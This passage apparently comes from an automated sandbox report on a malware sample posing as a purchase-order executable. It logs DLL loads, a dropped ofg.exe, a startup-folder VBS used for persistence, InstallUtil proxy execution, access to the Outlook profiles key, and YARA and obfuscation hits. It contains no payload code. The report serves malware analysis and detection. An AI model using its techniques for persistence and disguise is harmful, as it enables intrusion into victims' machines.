                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: purchase order T&B19-20PO128.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: purchase order T&B19-20PO128.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1408053183.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003CAC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1408053183.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003CAC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: purchase order T&B19-20PO128.exe, AdaptableStack.cs.Net Code: PushExpandableStack System.AppDomain.Load(byte[])
                      Source: ofg.exe.0.dr, AdaptableStack.cs.Net Code: PushExpandableStack System.AppDomain.Load(byte[])
                      Source: 0.2.purchase order T&B19-20PO128.exe.3a1c450.4.raw.unpack, AdaptableStack.cs.Net Code: PushExpandableStack System.AppDomain.Load(byte[])
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 18.2.ofg.exe.391cf50.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.5820000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.37a9d87.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.5820000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.391cf50.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1390243265.000000000253F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1406713277.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: purchase order T&B19-20PO128.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ofg.exe PID: 3932, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633B9C8 push es; iretd 0_2_0633B9CC
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_026204D8 push esi; retn 0000h18_2_026204E2
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_02623277 push edi; retn 5500h18_2_02623296
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E006F3 pushad ; iretd 18_2_05E006F9

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile created: C:\Users\user\AppData\Roaming\ofg.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbsJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbsJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
